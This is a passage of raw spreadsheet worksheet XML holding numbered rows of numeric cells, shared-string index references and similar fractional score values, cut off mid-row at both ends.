      <c r="E19295" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19295" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19296" ht="15.75" customHeight="1">
      <c r="A19296" s="1">
        <v>33275.0</v>
      </c>
      <c r="B19296" s="2">
        <v>7423298.0</v>
      </c>
      <c r="C19296" s="2" t="s">
        <v>18595</v>
      </c>
      <c r="D19296" s="2">
        <v>1.0</v>
      </c>
      <c r="E19296" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19296" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19297" ht="15.75" customHeight="1">
      <c r="A19297" s="1">
        <v>33418.0</v>
      </c>
      <c r="B19297" s="2">
        <v>7745422.0</v>
      </c>
      <c r="C19297" s="2" t="s">
        <v>18598</v>
      </c>
      <c r="D19297" s="2">
        <v>1.0</v>
      </c>
      <c r="E19297" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19297" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19298" ht="15.75" customHeight="1">
      <c r="A19298" s="1">
        <v>33500.0</v>
      </c>
      <c r="B19298" s="2">
        <v>8055530.0</v>
      </c>
      <c r="C19298" s="2" t="s">
        <v>18599</v>
      </c>
      <c r="D19298" s="2">
        <v>1.0</v>
      </c>
      <c r="E19298" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19298" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19299" ht="15.75" customHeight="1">
      <c r="A19299" s="1">
        <v>33816.0</v>
      </c>
      <c r="B19299" s="2">
        <v>8905684.0</v>
      </c>
      <c r="C19299" s="2" t="s">
        <v>18599</v>
      </c>
      <c r="D19299" s="2">
        <v>1.0</v>
      </c>
      <c r="E19299" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19299" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19300" ht="15.75" customHeight="1">
      <c r="A19300" s="1">
        <v>34092.0</v>
      </c>
      <c r="B19300" s="2">
        <v>9694132.0</v>
      </c>
      <c r="C19300" s="2" t="s">
        <v>18600</v>
      </c>
      <c r="D19300" s="2">
        <v>1.0</v>
      </c>
      <c r="E19300" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19300" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19301" ht="15.75" customHeight="1">
      <c r="A19301" s="1">
        <v>34236.0</v>
      </c>
      <c r="B19301" s="2">
        <v>4730069.0</v>
      </c>
      <c r="C19301" s="2" t="s">
        <v>18601</v>
      </c>
      <c r="D19301" s="2">
        <v>1.0</v>
      </c>
      <c r="E19301" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19301" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19302" ht="15.75" customHeight="1">
      <c r="A19302" s="1">
        <v>34238.0</v>
      </c>
      <c r="B19302" s="2">
        <v>4730876.0</v>
      </c>
      <c r="C19302" s="2" t="s">
        <v>18602</v>
      </c>
      <c r="D19302" s="2">
        <v>1.0</v>
      </c>
      <c r="E19302" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19302" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19303" ht="15.75" customHeight="1">
      <c r="A19303" s="1">
        <v>12325.0</v>
      </c>
      <c r="B19303" s="2">
        <v>2.8500733E7</v>
      </c>
      <c r="C19303" s="2" t="s">
        <v>18603</v>
      </c>
      <c r="D19303" s="2">
        <v>1.0</v>
      </c>
      <c r="E19303" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19303" s="2">
        <v>0.09748427672955974</v>
      </c>
    </row>
    <row r="19304" ht="15.75" customHeight="1">
      <c r="A19304" s="1">
        <v>30811.0</v>
      </c>
      <c r="B19304" s="2">
        <v>4.5288882E7</v>
      </c>
      <c r="C19304" s="2" t="s">
        <v>18604</v>
      </c>
      <c r="D19304" s="2">
        <v>1.0</v>
      </c>
      <c r="E19304" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19304" s="2">
        <v>0.09748427672955974</v>
      </c>
    </row>
    <row r="19305" ht="15.75" customHeight="1">
      <c r="A19305" s="1">
        <v>27948.0</v>
      </c>
      <c r="B19305" s="2">
        <v>2.3846991E7</v>
      </c>
      <c r="C19305" s="2" t="s">
        <v>18605</v>
      </c>
      <c r="D19305" s="2">
        <v>1.0</v>
      </c>
      <c r="E19305" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19305" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="19306" ht="15.75" customHeight="1">
      <c r="A19306" s="1">
        <v>7935.0</v>
      </c>
      <c r="B19306" s="2">
        <v>5.2593695E7</v>
      </c>
      <c r="C19306" s="2" t="s">
        <v>18606</v>
      </c>
      <c r="D19306" s="2">
        <v>1.0</v>
      </c>
      <c r="E19306" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19306" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="19307" ht="15.75" customHeight="1">
      <c r="A19307" s="1">
        <v>20823.0</v>
      </c>
      <c r="B19307" s="2">
        <v>1.54046E7</v>
      </c>
      <c r="C19307" s="2" t="s">
        <v>18607</v>
      </c>
      <c r="D19307" s="2">
        <v>1.0</v>
      </c>
      <c r="E19307" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19307" s="2">
        <v>0.0969498910675381</v>
      </c>
    </row>
    <row r="19308" ht="15.75" customHeight="1">
      <c r="A19308" s="1">
        <v>28375.0</v>
      </c>
      <c r="B19308" s="2">
        <v>2.6105639E7</v>
      </c>
      <c r="C19308" s="2" t="s">
        <v>18608</v>
      </c>
      <c r="D19308" s="2">
        <v>1.0</v>
      </c>
      <c r="E19308" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19308" s="2">
        <v>0.0969498910675381</v>
      </c>
    </row>
    <row r="19309" ht="15.75" customHeight="1">
      <c r="A19309" s="1">
        <v>10997.0</v>
      </c>
      <c r="B19309" s="2">
        <v>1.7584594E7</v>
      </c>
      <c r="C19309" s="2" t="s">
        <v>18609</v>
      </c>
      <c r="D19309" s="2">
        <v>1.0</v>
      </c>
      <c r="E19309" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19309" s="2">
        <v>0.09649122807017546</v>
      </c>
    </row>
    <row r="19310" ht="15.75" customHeight="1">
      <c r="A19310" s="1">
        <v>2810.0</v>
      </c>
      <c r="B19310" s="2">
        <v>3.5366478E7</v>
      </c>
      <c r="C19310" s="2" t="s">
        <v>18610</v>
      </c>
      <c r="D19310" s="2">
        <v>1.0</v>
      </c>
      <c r="E19310" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19310" s="2">
        <v>0.09649122807017545</v>
      </c>
    </row>
    <row r="19311" ht="15.75" customHeight="1">
      <c r="A19311" s="1">
        <v>8420.0</v>
      </c>
      <c r="B19311" s="2">
        <v>5.3926649E7</v>
      </c>
      <c r="C19311" s="2" t="s">
        <v>18611</v>
      </c>
      <c r="D19311" s="2">
        <v>1.0</v>
      </c>
      <c r="E19311" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19311" s="2">
        <v>0.09623015873015875</v>
      </c>
    </row>
    <row r="19312" ht="15.75" customHeight="1">
      <c r="A19312" s="1">
        <v>5334.0</v>
      </c>
      <c r="B19312" s="2">
        <v>4.5317798E7</v>
      </c>
      <c r="C19312" s="2" t="s">
        <v>18612</v>
      </c>
      <c r="D19312" s="2">
        <v>1.0</v>
      </c>
      <c r="E19312" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19312" s="2">
        <v>0.09623015873015874</v>
      </c>
    </row>
    <row r="19313" ht="15.75" customHeight="1">
      <c r="A19313" s="1">
        <v>29057.0</v>
      </c>
      <c r="B19313" s="2">
        <v>3.0243972E7</v>
      </c>
      <c r="C19313" s="2" t="s">
        <v>18613</v>
      </c>
      <c r="D19313" s="2">
        <v>1.0</v>
      </c>
      <c r="E19313" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19313" s="2">
        <v>0.09623015873015872</v>
      </c>
    </row>
    <row r="19314" ht="15.75" customHeight="1">
      <c r="A19314" s="1">
        <v>4882.0</v>
      </c>
      <c r="B19314" s="2">
        <v>4.3859352E7</v>
      </c>
      <c r="C19314" s="2" t="s">
        <v>18614</v>
      </c>
      <c r="D19314" s="2">
        <v>1.0</v>
      </c>
      <c r="E19314" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19314" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="19315" ht="15.75" customHeight="1">
      <c r="A19315" s="1">
        <v>8113.0</v>
      </c>
      <c r="B19315" s="2">
        <v>5.3073521E7</v>
      </c>
      <c r="C19315" s="2" t="s">
        <v>18615</v>
      </c>
      <c r="D19315" s="2">
        <v>1.0</v>
      </c>
      <c r="E19315" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19315" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="19316" ht="15.75" customHeight="1">
      <c r="A19316" s="1">
        <v>23259.0</v>
      </c>
      <c r="B19316" s="2">
        <v>5.3168255E7</v>
      </c>
      <c r="C19316" s="2" t="s">
        <v>18616</v>
      </c>
      <c r="D19316" s="2">
        <v>1.0</v>
      </c>
      <c r="E19316" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19316" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="19317" ht="15.75" customHeight="1">
      <c r="A19317" s="1">
        <v>1203.0</v>
      </c>
      <c r="B19317" s="2">
        <v>2.4799365E7</v>
      </c>
      <c r="C19317" s="2" t="s">
        <v>18617</v>
      </c>
      <c r="D19317" s="2">
        <v>1.0</v>
      </c>
      <c r="E19317" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19317" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="19318" ht="15.75" customHeight="1">
      <c r="A19318" s="1">
        <v>4565.0</v>
      </c>
      <c r="B19318" s="2">
        <v>4.2726323E7</v>
      </c>
      <c r="C19318" s="2" t="s">
        <v>18618</v>
      </c>
      <c r="D19318" s="2">
        <v>1.0</v>
      </c>
      <c r="E19318" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19318" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="19319" ht="15.75" customHeight="1">
      <c r="A19319" s="1">
        <v>28855.0</v>
      </c>
      <c r="B19319" s="2">
        <v>2.9022827E7</v>
      </c>
      <c r="C19319" s="2" t="s">
        <v>18086</v>
      </c>
      <c r="D19319" s="2">
        <v>1.0</v>
      </c>
      <c r="E19319" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19319" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="19320" ht="15.75" customHeight="1">
      <c r="A19320" s="1">
        <v>6710.0</v>
      </c>
      <c r="B19320" s="2">
        <v>4.9250691E7</v>
      </c>
      <c r="C19320" s="2" t="s">
        <v>18619</v>
      </c>
      <c r="D19320" s="2">
        <v>1.0</v>
      </c>
      <c r="E19320" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19320" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="19321" ht="15.75" customHeight="1">
      <c r="A19321" s="1">
        <v>9312.0</v>
      </c>
      <c r="B19321" s="2">
        <v>5.5575277E7</v>
      </c>
      <c r="C19321" s="2" t="s">
        <v>18620</v>
      </c>
      <c r="D19321" s="2">
        <v>1.0</v>
      </c>
      <c r="E19321" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19321" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="19322" ht="15.75" customHeight="1">
      <c r="A19322" s="1">
        <v>11558.0</v>
      </c>
      <c r="B19322" s="2">
        <v>2.2710429E7</v>
      </c>
      <c r="C19322" s="2" t="s">
        <v>18621</v>
      </c>
      <c r="D19322" s="2">
        <v>1.0</v>
      </c>
      <c r="E19322" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19322" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="19323" ht="15.75" customHeight="1">
      <c r="A19323" s="1">
        <v>17802.0</v>
      </c>
      <c r="B19323" s="2">
        <v>5.0809736E7</v>
      </c>
      <c r="C19323" s="5" t="s">
        <v>18622</v>
      </c>
      <c r="D19323" s="2">
        <v>1.0</v>
      </c>
      <c r="E19323" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19323" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="19324" ht="15.75" customHeight="1">
      <c r="A19324" s="1">
        <v>18551.0</v>
      </c>
      <c r="B19324" s="2">
        <v>5.3138943E7</v>
      </c>
      <c r="C19324" s="2" t="s">
        <v>18623</v>
      </c>
      <c r="D19324" s="2">
        <v>1.0</v>
      </c>
      <c r="E19324" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19324" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="19325" ht="15.75" customHeight="1">
      <c r="A19325" s="1">
        <v>19856.0</v>
      </c>
      <c r="B19325" s="2">
        <v>5.7151182E7</v>
      </c>
      <c r="C19325" s="2" t="s">
        <v>18624</v>
      </c>
      <c r="D19325" s="2">
        <v>1.0</v>
      </c>
      <c r="E19325" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19325" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="19326" ht="15.75" customHeight="1">
      <c r="A19326" s="1">
        <v>26417.0</v>
      </c>
      <c r="B19326" s="2">
        <v>1.7141075E7</v>
      </c>
      <c r="C19326" s="2" t="s">
        <v>18625</v>
      </c>
      <c r="D19326" s="2">
        <v>1.0</v>
      </c>
      <c r="E19326" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19326" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="19327" ht="15.75" customHeight="1">
      <c r="A19327" s="1">
        <v>28748.0</v>
      </c>
      <c r="B19327" s="2">
        <v>2.8122256E7</v>
      </c>
      <c r="C19327" s="2" t="s">
        <v>18626</v>
      </c>
      <c r="D19327" s="2">
        <v>1.0</v>
      </c>
      <c r="E19327" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19327" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="19328" ht="15.75" customHeight="1">
      <c r="A19328" s="1">
        <v>34045.0</v>
      </c>
      <c r="B19328" s="2">
        <v>9576998.0</v>
      </c>
      <c r="C19328" s="2" t="s">
        <v>18627</v>
      </c>
      <c r="D19328" s="2">
        <v>1.0</v>
      </c>
      <c r="E19328" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19328" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="19329" ht="15.75" customHeight="1">
      <c r="A19329" s="1">
        <v>20.0</v>
      </c>
      <c r="B19329" s="2">
        <v>1.0448447E7</v>
      </c>
      <c r="C19329" s="2" t="s">
        <v>18628</v>
      </c>
      <c r="D19329" s="2">
        <v>1.0</v>
      </c>
      <c r="E19329" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19329" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19330" ht="15.75" customHeight="1">
      <c r="A19330" s="1">
        <v>326.0</v>
      </c>
      <c r="B19330" s="2">
        <v>1.5734956E7</v>
      </c>
      <c r="C19330" s="2" t="s">
        <v>18629</v>
      </c>
      <c r="D19330" s="2">
        <v>1.0</v>
      </c>
      <c r="E19330" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19330" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19331" ht="15.75" customHeight="1">
      <c r="A19331" s="1">
        <v>407.0</v>
      </c>
      <c r="B19331" s="2">
        <v>1.6687635E7</v>
      </c>
      <c r="C19331" s="2" t="s">
        <v>18630</v>
      </c>
      <c r="D19331" s="2">
        <v>1.0</v>
      </c>
      <c r="E19331" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19331" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19332" ht="15.75" customHeight="1">
      <c r="A19332" s="1">
        <v>423.0</v>
      </c>
      <c r="B19332" s="2">
        <v>1.6850133E7</v>
      </c>
      <c r="C19332" s="2" t="s">
        <v>18631</v>
      </c>
      <c r="D19332" s="2">
        <v>1.0</v>
      </c>
      <c r="E19332" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19332" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19333" ht="15.75" customHeight="1">
      <c r="A19333" s="1">
        <v>667.0</v>
      </c>
      <c r="B19333" s="2">
        <v>2.0209975E7</v>
      </c>
      <c r="C19333" s="2" t="s">
        <v>18632</v>
      </c>
      <c r="D19333" s="2">
        <v>1.0</v>
      </c>
      <c r="E19333" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19333" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19334" ht="15.75" customHeight="1">
      <c r="A19334" s="1">
        <v>791.0</v>
      </c>
      <c r="B19334" s="2">
        <v>2.1219791E7</v>
      </c>
      <c r="C19334" s="2" t="s">
        <v>18633</v>
      </c>
      <c r="D19334" s="2">
        <v>1.0</v>
      </c>
      <c r="E19334" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19334" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19335" ht="15.75" customHeight="1">
      <c r="A19335" s="1">
        <v>859.0</v>
      </c>
      <c r="B19335" s="2">
        <v>2.175175E7</v>
      </c>
      <c r="C19335" s="2" t="s">
        <v>18634</v>
      </c>
      <c r="D19335" s="2">
        <v>1.0</v>
      </c>
      <c r="E19335" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19335" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19336" ht="15.75" customHeight="1">
      <c r="A19336" s="1">
        <v>1365.0</v>
      </c>
      <c r="B19336" s="2">
        <v>2.6012138E7</v>
      </c>
      <c r="C19336" s="2" t="s">
        <v>18635</v>
      </c>
      <c r="D19336" s="2">
        <v>1.0</v>
      </c>
      <c r="E19336" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19336" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19337" ht="15.75" customHeight="1">
      <c r="A19337" s="1">
        <v>1425.0</v>
      </c>
      <c r="B19337" s="2">
        <v>2.6585738E7</v>
      </c>
      <c r="C19337" s="2" t="s">
        <v>18636</v>
      </c>
      <c r="D19337" s="2">
        <v>1.0</v>
      </c>
      <c r="E19337" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19337" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19338" ht="15.75" customHeight="1">
      <c r="A19338" s="1">
        <v>2727.0</v>
      </c>
      <c r="B19338" s="2">
        <v>3.4974289E7</v>
      </c>
      <c r="C19338" s="2" t="s">
        <v>18637</v>
      </c>
      <c r="D19338" s="2">
        <v>1.0</v>
      </c>
      <c r="E19338" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19338" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19339" ht="15.75" customHeight="1">
      <c r="A19339" s="1">
        <v>2798.0</v>
      </c>
      <c r="B19339" s="2">
        <v>3.5279523E7</v>
      </c>
      <c r="C19339" s="2" t="s">
        <v>18638</v>
      </c>
      <c r="D19339" s="2">
        <v>1.0</v>
      </c>
      <c r="E19339" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19339" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19340" ht="15.75" customHeight="1">
      <c r="A19340" s="1">
        <v>2963.0</v>
      </c>
      <c r="B19340" s="2">
        <v>3.6067643E7</v>
      </c>
      <c r="C19340" s="2" t="s">
        <v>18639</v>
      </c>
      <c r="D19340" s="2">
        <v>1.0</v>
      </c>
      <c r="E19340" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19340" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19341" ht="15.75" customHeight="1">
      <c r="A19341" s="1">
        <v>3151.0</v>
      </c>
      <c r="B19341" s="2">
        <v>3.6984668E7</v>
      </c>
      <c r="C19341" s="2" t="s">
        <v>18640</v>
      </c>
      <c r="D19341" s="2">
        <v>1.0</v>
      </c>
      <c r="E19341" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19341" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19342" ht="15.75" customHeight="1">
      <c r="A19342" s="1">
        <v>3284.0</v>
      </c>
      <c r="B19342" s="2">
        <v>3.7500693E7</v>
      </c>
      <c r="C19342" s="2" t="s">
        <v>18641</v>
      </c>
      <c r="D19342" s="2">
        <v>1.0</v>
      </c>
      <c r="E19342" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19342" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19343" ht="15.75" customHeight="1">
      <c r="A19343" s="1">
        <v>3813.0</v>
      </c>
      <c r="B19343" s="2">
        <v>4.0074667E7</v>
      </c>
      <c r="C19343" s="2" t="s">
        <v>18642</v>
      </c>
      <c r="D19343" s="2">
        <v>1.0</v>
      </c>
      <c r="E19343" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19343" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19344" ht="15.75" customHeight="1">
      <c r="A19344" s="1">
        <v>3838.0</v>
      </c>
      <c r="B19344" s="2">
        <v>4.0204367E7</v>
      </c>
      <c r="C19344" s="2" t="s">
        <v>18643</v>
      </c>
      <c r="D19344" s="2">
        <v>1.0</v>
      </c>
      <c r="E19344" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19344" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19345" ht="15.75" customHeight="1">
      <c r="A19345" s="1">
        <v>4485.0</v>
      </c>
      <c r="B19345" s="2">
        <v>4.2509586E7</v>
      </c>
      <c r="C19345" s="2" t="s">
        <v>18644</v>
      </c>
      <c r="D19345" s="2">
        <v>1.0</v>
      </c>
      <c r="E19345" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19345" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19346" ht="15.75" customHeight="1">
      <c r="A19346" s="1">
        <v>5046.0</v>
      </c>
      <c r="B19346" s="2">
        <v>4.4319612E7</v>
      </c>
      <c r="C19346" s="2" t="s">
        <v>18645</v>
      </c>
      <c r="D19346" s="2">
        <v>1.0</v>
      </c>
      <c r="E19346" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19346" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19347" ht="15.75" customHeight="1">
      <c r="A19347" s="1">
        <v>5105.0</v>
      </c>
      <c r="B19347" s="2">
        <v>4.4528448E7</v>
      </c>
      <c r="C19347" s="2" t="s">
        <v>18089</v>
      </c>
      <c r="D19347" s="2">
        <v>1.0</v>
      </c>
      <c r="E19347" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19347" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19348" ht="15.75" customHeight="1">
      <c r="A19348" s="1">
        <v>5203.0</v>
      </c>
      <c r="B19348" s="2">
        <v>4.4899272E7</v>
      </c>
      <c r="C19348" s="2" t="s">
        <v>18646</v>
      </c>
      <c r="D19348" s="2">
        <v>1.0</v>
      </c>
      <c r="E19348" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19348" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19349" ht="15.75" customHeight="1">
      <c r="A19349" s="1">
        <v>5431.0</v>
      </c>
      <c r="B19349" s="2">
        <v>4.5576773E7</v>
      </c>
      <c r="C19349" s="2" t="s">
        <v>18647</v>
      </c>
      <c r="D19349" s="2">
        <v>1.0</v>
      </c>
      <c r="E19349" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19349" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19350" ht="15.75" customHeight="1">
      <c r="A19350" s="1">
        <v>5451.0</v>
      </c>
      <c r="B19350" s="2">
        <v>4.5640993E7</v>
      </c>
      <c r="C19350" s="2" t="s">
        <v>18648</v>
      </c>
      <c r="D19350" s="2">
        <v>1.0</v>
      </c>
      <c r="E19350" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19350" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19351" ht="15.75" customHeight="1">
      <c r="A19351" s="1">
        <v>6042.0</v>
      </c>
      <c r="B19351" s="2">
        <v>4.7594337E7</v>
      </c>
      <c r="C19351" s="2" t="s">
        <v>18649</v>
      </c>
      <c r="D19351" s="2">
        <v>1.0</v>
      </c>
      <c r="E19351" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19351" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19352" ht="15.75" customHeight="1">
      <c r="A19352" s="1">
        <v>6148.0</v>
      </c>
      <c r="B19352" s="2">
        <v>4.7835781E7</v>
      </c>
      <c r="C19352" s="2" t="s">
        <v>18650</v>
      </c>
      <c r="D19352" s="2">
        <v>1.0</v>
      </c>
      <c r="E19352" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19352" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19353" ht="15.75" customHeight="1">
      <c r="A19353" s="1">
        <v>6993.0</v>
      </c>
      <c r="B19353" s="2">
        <v>5.0073692E7</v>
      </c>
      <c r="C19353" s="2" t="s">
        <v>18651</v>
      </c>
      <c r="D19353" s="2">
        <v>1.0</v>
      </c>
      <c r="E19353" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19353" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19354" ht="15.75" customHeight="1">
      <c r="A19354" s="1">
        <v>7056.0</v>
      </c>
      <c r="B19354" s="2">
        <v>5.0200467E7</v>
      </c>
      <c r="C19354" s="2" t="s">
        <v>18652</v>
      </c>
      <c r="D19354" s="2">
        <v>1.0</v>
      </c>
      <c r="E19354" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19354" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19355" ht="15.75" customHeight="1">
      <c r="A19355" s="1">
        <v>7880.0</v>
      </c>
      <c r="B19355" s="2">
        <v>5.2412681E7</v>
      </c>
      <c r="C19355" s="2" t="s">
        <v>18653</v>
      </c>
      <c r="D19355" s="2">
        <v>1.0</v>
      </c>
      <c r="E19355" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19355" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19356" ht="15.75" customHeight="1">
      <c r="A19356" s="1">
        <v>8115.0</v>
      </c>
      <c r="B19356" s="2">
        <v>5.307469E7</v>
      </c>
      <c r="C19356" s="2" t="s">
        <v>18654</v>
      </c>
      <c r="D19356" s="2">
        <v>1.0</v>
      </c>
      <c r="E19356" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19356" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19357" ht="15.75" customHeight="1">
      <c r="A19357" s="1">
        <v>8116.0</v>
      </c>
      <c r="B19357" s="2">
        <v>5.307469E7</v>
      </c>
      <c r="C19357" s="2" t="s">
        <v>18655</v>
      </c>
      <c r="D19357" s="2">
        <v>1.0</v>
      </c>
      <c r="E19357" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19357" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19358" ht="15.75" customHeight="1">
      <c r="A19358" s="1">
        <v>9404.0</v>
      </c>
      <c r="B19358" s="2">
        <v>5.576675E7</v>
      </c>
      <c r="C19358" s="2" t="s">
        <v>18656</v>
      </c>
      <c r="D19358" s="2">
        <v>1.0</v>
      </c>
      <c r="E19358" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19358" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19359" ht="15.75" customHeight="1">
      <c r="A19359" s="1">
        <v>9436.0</v>
      </c>
      <c r="B19359" s="2">
        <v>5.580628E7</v>
      </c>
      <c r="C19359" s="2" t="s">
        <v>18657</v>
      </c>
      <c r="D19359" s="2">
        <v>1.0</v>
      </c>
      <c r="E19359" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19359" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19360" ht="15.75" customHeight="1">
      <c r="A19360" s="1">
        <v>10437.0</v>
      </c>
      <c r="B19360" s="2">
        <v>1.0364097E7</v>
      </c>
      <c r="C19360" s="2" t="s">
        <v>18658</v>
      </c>
      <c r="D19360" s="2">
        <v>1.0</v>
      </c>
      <c r="E19360" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19360" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19361" ht="15.75" customHeight="1">
      <c r="A19361" s="1">
        <v>10798.0</v>
      </c>
      <c r="B19361" s="2">
        <v>1.5779983E7</v>
      </c>
      <c r="C19361" s="2" t="s">
        <v>18659</v>
      </c>
      <c r="D19361" s="2">
        <v>1.0</v>
      </c>
      <c r="E19361" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19361" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19362" ht="15.75" customHeight="1">
      <c r="A19362" s="1">
        <v>10830.0</v>
      </c>
      <c r="B19362" s="2">
        <v>1.5992104E7</v>
      </c>
      <c r="C19362" s="2" t="s">
        <v>18660</v>
      </c>
      <c r="D19362" s="2">
        <v>1.0</v>
      </c>
      <c r="E19362" s="3" t="s">
